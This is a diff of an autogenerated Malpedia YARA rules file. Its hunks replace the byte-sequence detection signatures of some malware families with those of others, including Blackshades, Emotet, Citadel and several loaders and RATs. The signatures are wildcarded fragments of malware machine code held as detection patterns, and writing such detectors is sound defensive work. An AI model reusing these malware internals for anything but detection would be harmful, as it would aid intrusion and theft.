-		$sequence_9 = { 57 4883ec20 418bf0 4c8d0d2b320100 8bda 4c8d051a320100 488bf9 }
+		$sequence_0 = { 8b7de0 85f6 0f8567ffffff 83ff20 0f83a8000000 83c8ff 2bc7 }
+		$sequence_1 = { 3975d4 7347 52 56 8d4dc0 }
+		$sequence_2 = { c3 e8???????? 85c0 0f843aa70000 c3 833d????????ff 7503 }
+		$sequence_3 = { c745ecd88e0210 894df8 8945fc 64a100000000 8945e8 }
+		$sequence_4 = { 83f924 7d10 8a80f8c70410 8807 47 }
+		$sequence_5 = { 8b45b8 8b11 03c6 50 56 8d450c 50 }
+		$sequence_6 = { 253bffffff 33f6 3bc8 740c 8b0cb584bf0410 46 85c9 }
+		$sequence_7 = { 7405 e8???????? a900000080 751f d9fa 833d????????00 0f85037f0000 }
+		$sequence_8 = { 2bc1 83f808 0f86bc000000 8d7108 83fefe }
+		$sequence_9 = { e8???????? 8d8d04ffffff e8???????? 8d4d8c e8???????? 8d4da4 }
 
 	condition:
-		7 of them and filesize < 808960
+		7 of them and filesize < 824320
 }
-rule MALPEDIA_Win_Treasurehunter_Auto : FILE
+rule MALPEDIA_Win_Blackshades_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e821ddca-c116-541d-9bd5-f7649288cdd5"
+		id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.treasurehunter_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackshades_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "102e6e7f9d869ce1a995b96c3cd12e8dc18894c29a700642a08bd98f281dfbdd"
+		logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114642,30 +114481,32 @@ rule MALPEDIA_Win_Treasurehunter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 6a01 6a00 e8???????? }
-		$sequence_1 = { 6800000020 6a2f 68???????? 57 ff15???????? 85c0 }
-		$sequence_2 = { 8a0e 46 84c9 75f9 2bf0 e8???????? }
-		$sequence_3 = { 56 57 8bf9 8bca e8???????? 8b7508 }
-		$sequence_4 = { 53 56 8b35???????? 8bd9 8b4d08 57 8955fc }
-		$sequence_5 = { 8bf1 85d2 7e0b 4a e8???????? 0fafc6 5e }
-		$sequence_6 = { 8903 ff15???????? 8b4dfc 57 }
-		$sequence_7 = { 6800040000 8d85fcfbffff 50 8d85fcf7ffff 50 e8???????? }
+		$sequence_0 = { ff9e0460ff34 6c 60 ff0a }
+		$sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e }
+		$sequence_2 = { 70ff f30004eb f4 02eb fb cf }
+		$sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 }
+		$sequence_4 = { 58 2f 60 ff6c74ff }
+		$sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 }
+		$sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b }
+		$sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a }
+		$sequence_8 = { ff6c48ff 6c 4c ff40fc }
+		$sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 999424
 }
-rule MALPEDIA_Win_T34Loader_Auto : FILE
+rule MALPEDIA_Win_Homefry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5720d10-2fbe-56e7-a983-268d042c48b1"
+		id = "d7d35e8c-e0c5-5ba6-b2d4-e95c77830765"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.t34loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.t34loader_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.homefry_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ec0cde05ce06de31a82d86f3a54c045f2d69d36946c25715e1f108cf44d303ce"
+		logic_hash = "3f2d14189cc000f371864eda6ce01209469d1d59387364413aee3876a7479356"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114679,34 +114520,34 @@ rule MALPEDIA_Win_T34Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7424 88542438 eb1e 4885c0 7505 4585ff 7414 }
-		$sequence_1 = { e8???????? 488d542420 488bcb e8???????? 488bcb e8???????? 84c0 }
-		$sequence_2 = { 743f 803d????????00 7436 48ffc0 4d8d1443 488b4587 48ffc0 }
-		$sequence_3 = { e8???????? 488b5710 488bc8 4889542420 4c8bcb }
-		$sequence_4 = { 418ac0 884708 488b542440 488bcf e8???????? 84c0 0f84e6feffff }
-		$sequence_5 = { 4c8bc7 488d4c2430 488bd6 e8???????? 488d4c2430 e8???????? }
-		$sequence_6 = { 0f845e010000 488b0f 33db 4885c9 7441 488b4138 483918 }
-		$sequence_7 = { e8???????? 488bd0 488d4d20 e8???????? 488bd3 488d4d30 e8???????? }
-		$sequence_8 = { 488d4138 41b806000000 488d15b1370200 483950f0 740c 488b10 4885d2 }
-		$sequence_9 = { 5f 5e 5d c3 4c8d05d3b50200 498b14e8 8a44fa38 }
+		$sequence_0 = { 4157 4883ec20 4c8b7908 0fb701 4d8bf0 410fb61f 4c8bda }
+		$sequence_1 = { c744246038020000 ff15???????? 85c0 751d }
+		$sequence_2 = { 410fb61f 4c8bda 83f801 7623 }
+		$sequence_3 = { 488905???????? ff15???????? 488b0d???????? 448b4c2470 4c8b05???????? 488b15???????? }
+		$sequence_4 = { ffd5 85c0 0f8860010000 488b0d???????? 458d4e20 4c8d05480f0000 488b09 }
+		$sequence_5 = { e9???????? 480578ffffff 833d????????06 488905???????? }
+		$sequence_6 = { 751c 488d0d8f060000 488b742440 488b7c2448 4883c420 415e }
+		$sequence_7 = { 7343 0f1f8000000000 4983c9ff 488bd7 488bcb }
+		$sequence_8 = { 488917 48630a 4883c104 4803ca 48890f }
+		$sequence_9 = { 742e 48ffc3 483bdd 72d0 488bcf ff15???????? 33c0 }
 
 	condition:
-		7 of them and filesize < 1212416
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Cargobay_Auto : FILE
+rule MALPEDIA_Win_Emotet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d6e48bf6-04f2-5926-86cf-d6b3d1d19c9e"
+		id = "590db82a-e64b-59fe-a363-cd344fccdc7b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cargobay_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.emotet_auto.yar#L1-L618"
 		license_url = "N/A"
-		logic_hash = "78bad24f78416452973bfe57bb2d3dc8c78eea72265f4a6384a2c196eab74e59"
+		logic_hash = "9ea1f202fdf175311dcb11b7b6f7efdcd86b6e87b055de16a61627e022c993b1"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114718,34 +114559,99 @@ rule MALPEDIA_Win_Cargobay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 0f0b 4883ec28 4889c8 488d0d735d0e00 48894c2420 41b900010000 }
-		$sequence_1 = { e8???????? 48894308 b801000000 ebd3 4881ec88000000 488d442428 488910 }
-		$sequence_2 = { e8???????? 4889f1 89c2 4883c420 5e e9???????? 56 }
-		$sequence_3 = { e8???????? 488d9424a0000000 440f294a10 440f2902 4c8db424e0000000 4c89f1 4989f8 }
-		$sequence_4 = { e9???????? 89f9 4429e1 488b742430 8d5601 4585e4 410f94c0 }
-		$sequence_5 = { 4c8ba424c8000000 4889f1 e8???????? 4885c0 7446 4989d0 4c89f1 }
-		$sequence_6 = { eb0d 488908 e9???????? 440fb76734 4929d4 488d7738 31ed }
-		$sequence_7 = { 49c1e104 31c0 4939c1 740b 41833c0000 488d4010 74f0 }
-		$sequence_8 = { c6455e00 4c8d05ed010900 4889e9 488d5548 e8???????? 31ff 4885f6 }
-		$sequence_9 = { e8???????? 4889e9 4c89ea e8???????? e9???????? 488d1512bb1200 488dbc24f0020000 }
+		$sequence_0 = { 3c41 7c04 3c5a 7e03 c60158 }
+		$sequence_1 = { 3c61 7c04 3c7a 7e0b 3c41 }
+		$sequence_2 = { 8a01 3c30 7c04 3c39 7e13 3c61 }
+		$sequence_3 = { 7e03 c60158 41 803900 }
+		$sequence_4 = { 3903 5f 5e 0f95c0 5b 8be5 }
+		$sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 }
+		$sequence_6 = { 880a 8bc1 c1e808 8d5204 }
+		$sequence_7 = { c1e910 8842fd 884afe c1e908 }
+		$sequence_8 = { 75f2 eb06 33c9 66894802 }
+		$sequence_9 = { c1e808 8d5204 c1e910 8842fd }
+		$sequence_10 = { 8d5801 f6c30f 7406 83e3f0 }
+		$sequence_11 = { 8b16 8945fc 8d45f8 6a04 }
+		$sequence_12 = { 0faf4510 50 6a08 ff15???????? }
+		$sequence_13 = { 8901 8b477c 85c0 7448 }
+		$sequence_14 = { 8b4508 894dcc 8d4dc8 8945c8 8975d4 }
+		$sequence_15 = { 7448 8b00 2b878c000000 56 }
+		$sequence_16 = { 894630 8b45f8 01460c 294610 }
+		$sequence_17 = { 50 8d45f8 81ca00000020 50 52 }
+		$sequence_18 = { 48894808 48895010 4c894018 4c894820 c3 }
+		$sequence_19 = { 488bd3 488bcf 488b5c2460 4883c450 }
+		$sequence_20 = { 0fb7c1 c1e910 66c1e808 4d8d4004 }
+		$sequence_21 = { 418bd0 d3e2 418bcb d3e0 03d0 }
+		$sequence_22 = { d3e7 83f841 7208 83f85a }
+		$sequence_23 = { 4803c8 eb08 803900 7408 }
+		$sequence_24 = { 2bca d1e9 03ca c1e906 894d18 }
+		$sequence_25 = { 4d8d4004 418840fd 418848fe 66c1e908 418848ff 4d3bd9 72cf }
+		$sequence_26 = { 483bd8 730b 488bcb e8???????? }
+		$sequence_27 = { c1e807 41 83f87f 77f7 }
+		$sequence_28 = { f7e1 b84fecc44e 2bca d1e9 }
+		$sequence_29 = { 84c0 75f2 eb03 c60100 }
+		$sequence_30 = { 8bd3 8b0f e8???????? 85c0 }
+		$sequence_31 = { 83c104 894e04 8b00 85c0 }
+		$sequence_32 = { 7907 83c107 3bf7 72e8 }
+		$sequence_33 = { 0fb6c0 668942fa c1e910 0fb6c1 }
+		$sequence_34 = { 56 57 6a1e 8d45e0 }
+		$sequence_35 = { 52 52 52 52 68???????? 52 }
+		$sequence_36 = { 83ec48 53 56 57 6a44 }
+		$sequence_37 = { 83f87f 760d 8d642400 c1e807 }
+		$sequence_38 = { 83f87f 7609 c1e807 41 }
+		$sequence_39 = { 50 6a00 6a01 6a00 ff15???????? a3???????? }
+		$sequence_40 = { 6a00 6aff 50 51 ff15???????? }
+		$sequence_41 = { 50 6a00 ff75fc 6800040000 }
+		$sequence_42 = { 50 56 6800800000 6a6a }
+		$sequence_43 = { 53 56 8bf1 bb00c34c84 }
+		$sequence_44 = { 83ec08 56 68400000f0 6a18 33f6 56 56 }
+		$sequence_45 = { ff75fc 6800040000 6a00 6a00 6a00 }
+		$sequence_46 = { 8bec 83ec08 56 57 8bf1 33ff }
+		$sequence_47 = { 83ec10 53 6a00 8d45fc }
+		$sequence_48 = { 8bf1 bb00c34c84 57 33ff }
+		$sequence_49 = { 8b7d08 83fe00 8945f0 894dec 8955e8 8975e4 }
+		$sequence_50 = { 6a03 6a00 6a00 ff7508 53 50 }
+		$sequence_51 = { 56 57 00b807000000 008b45fc33d2 00b871800780 00558b ec }
+		$sequence_52 = { 8b55f4 01ca 89d6 83c60c 8b7df4 8b4c0f0c 83f900 }
+		$sequence_53 = { 56 8b4510 8b4d0c 8b5508 befbffffff c600e8 }
+		$sequence_54 = { 51 8d4df8 51 ff75f8 50 6a03 }
+		$sequence_55 = { 39c7 0f97c7 08fb f6c301 89f0 8945a4 }
+		$sequence_56 = { 8b466c 5f 5e 5b 8be5 5d }
+		$sequence_57 = { 8b7020 8b7840 89c3 83c33c }
+		$sequence_58 = { 31f6 89720c 897208 897204 }
+		$sequence_59 = { 7519 33c9 0f1f4000 0fb6840c30010000 }
+		$sequence_60 = { ff15???????? 83f803 7405 83f802 751e }
+		$sequence_61 = { 743e 8b5c2430 85db 741d }
+		$sequence_62 = { 31c9 89e2 31f6 89720c }
+		$sequence_63 = { 33d2 c605????????00 0fb6d8 e8???????? }
+		$sequence_64 = { 8bf8 e8???????? eb04 8b7c2430 }
+		$sequence_65 = { e8???????? 84c0 7519 33c9 }
+		$sequence_66 = { 81fecd000000 7740 0fb6b62043e601 ff24b50443e601 884801 80ca04 }
+		$sequence_67 = { e9???????? 8b84248c000000 f20f10842490000000 31c9 }
+		$sequence_68 = { 89e8 894c247c 8b8c2480000000 01c8 83c1c0 }
+		$sequence_69 = { 744b 488d15583f0000 488bc8 e8???????? 4885c0 742f }
+		$sequence_70 = { 488b43f8 4c8d4be0 4889442428 8b03 498d55ff 4c8d05ce3f0000 89442420 }
+		$sequence_71 = { c744240400000000 8954240c e8???????? 8d0d2231d800 890424 }
+		$sequence_72 = { 53 57 56 83ec44 8b442454 8d0d5830d800 }
+		$sequence_73 = { dd5c2450 f20f10442450 8b442444 8b4838 }
+		$sequence_74 = { 8bcc 8bd0 895c2420 e8???????? 44 8bc3 48 }
 
 	condition:
-		7 of them and filesize < 3432448
+		7 of them and filesize < 733184
 }
-rule MALPEDIA_Win_Aresloader_Auto : FILE
+rule MALPEDIA_Win_Cloudwizard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f289d632-cafa-52d9-b441-3cf36142832f"
+		id = "abbdc257-eb7b-5dbc-b89d-fa521addbb7b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aresloader_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudwizard_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7dea272de803a78d1da18f0ee0ed5e7c3024e3919d3d811c7316d385075c0ef8"
-		score = 60
-		quality = 25
+		logic_hash = "73a241c1b717ddfac0eb8392f69e9bf260621defdb3bc053842ea74bc39dad65"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114757,32 +114663,32 @@ rule MALPEDIA_Win_Aresloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895c2404 893424 e8???????? 85c0 7831 39d8 7205 }
-		$sequence_1 = { 39d8 7205 c6441eff00 83c41c 5b }
-		$sequence_2 = { 83ec1c 8b5c2434 8b742430 8b7c2438 8b6c243c 85db 7435 }
-		$sequence_3 = { 8b6c243c 85db 7435 85f6 7431 }
-		$sequence_4 = { 85f6 7431 896c240c 897c2408 895c2404 }
-		$sequence_5 = { 85db 7435 85f6 7431 896c240c }
-		$sequence_6 = { 8b5c2434 8b742430 8b7c2438 8b6c243c 85db 7435 85f6 }
-		$sequence_7 = { 85c0 7831 39d8 7205 }
-		$sequence_8 = { 7431 896c240c 897c2408 895c2404 893424 }
-		$sequence_9 = { e8???????? 85c0 7831 39d8 7205 c6441eff00 83c41c }
+		$sequence_0 = { 8d4802 668b38 40 40 6685ff }
+		$sequence_1 = { d1f8 51 8d844618060000 50 e8???????? bf???????? 8bc7 }
+		$sequence_2 = { 57 50 e8???????? 8d4570 83c40c }
+		$sequence_3 = { 8bc6 8975ec e8???????? ff750c 8b06 ff7508 8bce }
+		$sequence_4 = { 6a5a 58 6a5d 66894544 }
+		$sequence_5 = { 58 6a44 668945a8 58 6a1b }
+		$sequence_6 = { 8986fc010000 897e70 c686c800000043 c6864b01000043 c7466838d54000 }
+		$sequence_7 = { 58 6a49 668945e4 58 668945e6 6a5d 58 }
+		$sequence_8 = { c645cf4a c645d044 c645d14d c645d27f 885dd3 8d45bc 59 }
+		$sequence_9 = { 8bce ff5010 6a04 33d2 59 }
 
 	condition:
-		7 of them and filesize < 2657280
+		7 of them and filesize < 134144
 }
-rule MALPEDIA_Win_Lemonduck_Auto : FILE
+rule MALPEDIA_Win_Ktlv_Door_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0687728c-af20-5db0-825f-c09419c968e6"
+		id = "6e065a03-91ac-5e12-9f0d-2a07114a6941"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lemonduck_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ktlv_door"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ktlv_door_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "98ef4bf0b78ddc5c7161294aca17f600a297dc9e3f0789809abaca00c16061d5"
+		logic_hash = "7086a37fac571e3e072f3722403d024774dd0aed3f77f3425014c9e7e0c7108d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114796,34 +114702,34 @@ rule MALPEDIA_Win_Lemonduck_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bc8 89834c010000 e8???????? 4863c8 48898b88000000 4883c420 }
-		$sequence_1 = { eb0f 488bd3 488d0deb090a00 e8???????? 33c9 85c0 480f44cb }
-		$sequence_2 = { c1e808 0bc8 41c1e808 c1e218 4133ca 440bc2 41894f10 }
-		$sequence_3 = { ff15???????? 488bf8 4885c0 0f841f020000 33c0 f0480fb13d???????? 488bf0 }
-		$sequence_4 = { 7404 893b eb34 3bfe 7330 2bf7 488d14bd00000000 }
-		$sequence_5 = { e8???????? e9???????? 488b8e50010000 488d85e8000000 4c8d8dd0000000 4889442420 4c8d85e0000000 }
-		$sequence_6 = { e8???????? 85c0 7419 41b80a000000 488d15eab90500 488bcb e8???????? }
-		$sequence_7 = { e8???????? e9???????? 664183780e03 0f85e0010000 488d1d8bee1500 4c8d3dacee1500 0f1f4000 }
-		$sequence_8 = { 75f7 8945c8 33c0 488945d8 488945e0 66448965e6 488b45e0 }
-		$sequence_9 = { ff5018 f6d8 1bdb 83c302 b978000000 e8???????? 488bf8 }
+		$sequence_0 = { ffc2 85d2 7d10 488d053ed25900 31db 31c9 e8???????? }
+		$sequence_1 = { eb0e 488d3d1a475800 6690 e8???????? 488d0594b92c00 e8???????? 48c7400836000000 }
+		$sequence_2 = { eb25 488b8424a00c0000 4889c3 488d8c24780a0000 0f1f4000 e8???????? 488b542430 }
+		$sequence_3 = { eb11 488d7818 488b8c2440080000 e8???????? 48c7400810000000 488d0da4e81900 488908 }
+		$sequence_4 = { ffd0 488bac24c8010000 4881c4d0010000 c3 48899c2450020000 48898c2458020000 c644243700 }
+		$sequence_5 = { eb0c 488d3d9bba4000 e8???????? 488b0d???????? 48898c2458050000 488d05800f1700 e8???????? }
+		$sequence_6 = { eb0d 488bbc24a8000000 e8???????? 4889c6 4889d9 488b842490000000 488b5c2460 }
+		$sequence_7 = { eb0e 488d7818 488b4c2418 e8???????? 4889c3 488d05371d3d00 488b6c2428 }
+		$sequence_8 = { eb11 488d7838 488b8c24e8010000 e8???????? 488d0d529c2900 4889c2 4889842400010000 }
+		$sequence_9 = { e8???????? 440f11bc24e0010000 440f11bc24f0010000 488b8c24e0000000 48898c24e0010000 488b8c24c8010000 48898c24e8010000 }
 
 	condition:
-		7 of them and filesize < 10011648
+		7 of them and filesize < 14630912
 }
-rule MALPEDIA_Win_Mimic_Auto : FILE
+rule MALPEDIA_Win_Qtbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8de2e30-a540-5075-b183-0c7273ee4c55"
+		id = "2b92b0c1-9b29-5389-8e3a-195746a37ab1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mimic_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qtbot_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "1c66a1ded66595b3251cf8ee2e17251126ee2cc563185ec6b8bc5f5c9095e6bc"
-		score = 75
-		quality = 75
+		logic_hash = "eee36880d1f59f5f14d38b39d151180259128bb7c87bcaf8aa7d62fcdb47e198"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114835,32 +114741,38 @@ rule MALPEDIA_Win_Mimic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 51 50 ff36 ff15???????? 85c0 0f84a30a0000 }
-		$sequence_1 = { 0fb6c3 8b5f30 330c8508fa5b00 8d0411 8b542420 33d0 8b442410 }
-		$sequence_2 = { 898554feffff 85c9 7436 8b9534feffff 8bc1 2bd1 81fa00100000 }
-		$sequence_3 = { 83c40c 56 ff15???????? e9???????? 52 51 }
-		$sequence_4 = { a0???????? 83ec0c 84c0 7404 8be5 5d c3 }
-		$sequence_5 = { ff15???????? 8b460c ff748604 ff15???????? 837e4800 7440 0f1f8000000000 }
-		$sequence_6 = { 3d???????? 740d 8bc8 e8???????? 8b0d???????? 8b5104 8b82f4d55e00 }
-		$sequence_7 = { 8d85b4f9ffff 50 56 ffd7 85c0 746c 8b8db8f9ffff }
-		$sequence_8 = { 50 51 8d8de0feffff e8???????? 6a18 68???????? 51 }
-		$sequence_9 = { ff75b8 0f4345a8 50 e8???????? 33c9 0f1000 0f11854cffffff }
+		$sequence_0 = { 8b4510 89450c 8d4301 0fb6d8 8a941dfcfeffff }
+		$sequence_1 = { 33c0 53 8a1a 6bc80d }
+		$sequence_2 = { 0fb6c3 83c0d0 03c1 25ffffff00 42 8a1a }
+		$sequence_3 = { 33f6 8bde 85ff 7455 8b4510 89450c }
+		$sequence_4 = { 84db 75e9 5b 5d }
+		$sequence_5 = { 64a130000000 8b400c 8b7014 ad 8b00 8b4010 }
+		$sequence_6 = { 742a 8b049a 03c6 50 e8???????? 3b4508 740b }
+		$sequence_7 = { 88841dfcfeffff 889435fcfeffff 0fb68c1dfcfeffff 0fb6c2 03c8 8b450c 0fb6c9 }
+		$sequence_8 = { 59 837e04ff 8bd8 8d7e08 7504 8b2f }
+		$sequence_9 = { 53 6a00 6a00 ff15???????? 833e05 7521 }
+		$sequence_10 = { 8d7e08 7504 8b2f eb02 8bef 8b06 83661c00 }
+		$sequence_11 = { eb60 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c300010 }
+		$sequence_12 = { 49 c745e8ff000000 8b3c857c300010 c745ecffff0000 0faff9 83f801 c745f0ffffff00 }
+		$sequence_13 = { 894dfc eb0e 8b14957c300010 49 0fafd1 }
+		$sequence_14 = { 83f807 0f87c7000000 ff24857e230010 832700 e9???????? }
+		$sequence_15 = { e9???????? 33c0 8b7df4 8b0c855c300010 }
 
 	condition:
-		7 of them and filesize < 4204544
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Citadel_Auto : FILE
+rule MALPEDIA_Win_Kasperagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "405c8c54-58ec-5453-982e-e98970e4bd4a"
+		id = "5bc59f22-b9b3-5766-9e08-5c129dbebf50"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.citadel_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kasperagent_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "9d24b0310c4a8508a9f96dd7e09a8073428bd68f73c4d97c0967ade9f8cc7c1c"
+		logic_hash = "8d5948eeb8ffe48e5f1f32cc1b2e0326c959eb92c3d2c7a0786033f96cdcbcd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114874,38 +114786,32 @@ rule MALPEDIA_Win_Citadel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0e 6800800000 53 57 }
-		$sequence_1 = { 03f7 6a0d 5f e8???????? }
-		$sequence_2 = { 3d00002003 7715 8b4d08 890e }
-		$sequence_3 = { 50 57 e8???????? 33db 3c01 }
-		$sequence_4 = { 41 66395802 7405 83c002 }
-		$sequence_5 = { a1???????? 57 e8???????? 8945fc 3bc3 }
-		$sequence_6 = { ff15???????? 85c0 0f8566010000 57 57 57 }
-		$sequence_7 = { 33c9 663918 7507 41 }
-		$sequence_8 = { eb81 d0e9 3aca 73fa 0fb6c9 8b04c8 ebae }
-		$sequence_9 = { 8b5004 0310 8d7101 3bf2 }
-		$sequence_10 = { 6685c0 7432 66ff460e 6639460e 7228 }
-		$sequence_11 = { 33c0 85c0 7409 3255fd }
-		$sequence_12 = { 6685c0 7432 66ff460c 6639460c }
-		$sequence_13 = { 5b b001 eb30 d0e8 }
-		$sequence_14 = { 85c0 740b 8a5604 8a4e01 ffd0 884601 33c0 }
-		$sequence_15 = { ffd0 8807 fe45ff 8a45ff 3a06 72c4 0fb7460a }
+		$sequence_0 = { ffd0 c645fc03 8b45bc 83c0f0 8d480c 83caff }
+		$sequence_1 = { 83c002 47 3bce 75eb 8bc3 3b5c2410 }
+		$sequence_2 = { 84db 7524 8b4500 83e810 ba01000000 }
+		$sequence_3 = { 663b54243a 7516 668b460c 663b44243c 750b b801000000 5f }
+		$sequence_4 = { 0fb74c2418 81c26c070000 40 668916 }
+		$sequence_5 = { 2bc6 0bd0 b301 7d08 56 8bcd e8???????? }
+		$sequence_6 = { 56 57 33ff 66837c24182d 897c2414 7472 }
+		$sequence_7 = { 89442408 8d742410 8d442408 c7470800000000 }
+		$sequence_8 = { ff500c 837d0800 75cc 5b 5d c20400 8bff }
+		$sequence_9 = { 57 56 ff15???????? 33c9 894c2430 894c2434 894c2438 }
 
 	condition:
-		7 of them and filesize < 1236992
+		7 of them and filesize < 1605632
 }
-rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
+rule MALPEDIA_Win_Bouncer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52944eb3-a8b3-598a-bd5c-c9c0b8dd95ba"
+		id = "d675a9d0-d309-5a64-9b07-233609ff1237"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.romcom_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bouncer_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "94e8976d75fd26e2288ab3e032c369598bcb0480813fc775078fe15324b5e802"
+		logic_hash = "ef61499d69e0696c4532f64e6ff2b982da08dae26c600412b066491c2f5e5346"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114919,32 +114825,32 @@ rule MALPEDIA_Win_Romcom_Rat_Auto : FILE
